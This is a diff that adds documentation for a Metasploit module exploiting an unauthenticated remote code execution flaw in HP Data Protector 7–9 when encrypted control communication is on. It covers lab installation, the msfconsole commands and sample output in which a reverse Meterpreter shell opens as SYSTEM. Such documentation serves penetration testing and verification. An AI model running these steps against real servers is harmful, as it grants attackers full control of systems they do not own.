|
| 1 | +HP Data Protector is an automated backup and recovery software for single-server to enterprise |
| 2 | +environments. It provides cross-platform, online backup of data for Microsoft Windows, Unix, |
| 3 | +and Linux operating systems. |
| 4 | + |
| 5 | +While the server is using Encrypted Control Communication, HP Data Protector allows a remote |
| 6 | +attacker to gain access without authentication, and gain arbitrary code execution under the |
| 7 | +context of SYSTEM. |
| 8 | + |
| 9 | + |
| 10 | +## Vulnerable Application |
| 11 | + |
| 12 | +HP Data Protector versions 7, 8, and 9 are known to be affected. |
| 13 | + |
| 14 | +hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008. |
| 15 | + |
| 16 | +## Verification Steps |
| 17 | + |
| 18 | +**Installing HP Data Protector** |
| 19 | + |
| 20 | +Before installing HP Data Protector, a Windows domain controller is needed. This exploit was tested |
| 21 | +against [a Windows Server 2008 R2 SP1 domain controller](https://www.youtube.com/watch?v=Buj9oEgbRt8). |
| 22 | + |
| 23 | +After setting up the domain controller, double-click on the HP Data Protector installer, and you |
| 24 | +should see this screen: |
| 25 | + |
| 26 | + |
| 27 | + |
| 28 | +Click on **Install Data Protector**. And then the installer should ask you which installation type: |
| 29 | + |
| 30 | + |
| 31 | + |
| 32 | +Make sure to select **Cell Manager**, and click **Next**. Use all default settings. |
| 33 | + |
| 34 | +**Enabling Encrypted Communication** |
| 35 | + |
| 36 | +After the Setup Wizard is finished, we need to enable encrypted communication. First, open the |
| 37 | +Data Protector GUI: |
| 38 | + |
| 39 | + |
| 40 | + |
| 41 | +Click on **Clients**, and the local client from the tree. You should see the **Connection** tab on the |
| 42 | +right, click on that. |
| 43 | + |
| 44 | + |
| 45 | + |
| 46 | +Under the Connection tab, there should be an **Encrypted control communication** checkbox, make |
| 47 | +sure that is checked. And then click **Apply** |
| 48 | + |
| 49 | +**Using hp_dataprotector_encrypted_comms** |
| 50 | + |
| 51 | +After the encrypted communication is enabled, you are ready to use |
| 52 | +hp_dataprotector_encrypted_comms. Here is what you do: |
| 53 | + |
| 54 | +1. Start msfconsole |
| 55 | +2. Do: ```use exploit/windows/misc/hp_dataprotector_encrypted_comms``` |
| 56 | +3. Do: ```set RHOST [IP ADDRESS]``` |
| 57 | +4. Do: ```set PAYLOAD [PAYLOAD NAME]``` |
| 58 | +5. Set other options as needed |
| 59 | +6. Do: ```exploit```, and you should receive a session like the following: |
| 60 | + |
| 61 | +``` |
| 62 | +msf exploit(hp_dataprotector_encrypted_comms) > run |
| 63 | +
|
| 64 | +[*] Started reverse TCP handler on 172.16.23.1:4444 |
| 65 | +[*] 172.16.23.173:5555 - Initiating connection |
| 66 | +[*] 172.16.23.173:5555 - Establishing encrypted channel |
| 67 | +[*] 172.16.23.173:5555 - Sending payload |
| 68 | +[*] 172.16.23.173:5555 - Waiting for payload execution (this can take up to 30 seconds or so) |
| 69 | +[*] Sending stage (957999 bytes) to 172.16.23.173 |
| 70 | +[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.173:49304) at 2016-06-06 22:16:54 -0500 |
| 71 | +
|
| 72 | +meterpreter > getuid |
| 73 | +Server username: NT AUTHORITY\SYSTEM |
| 74 | +``` |
| 75 | + |
0 commit comments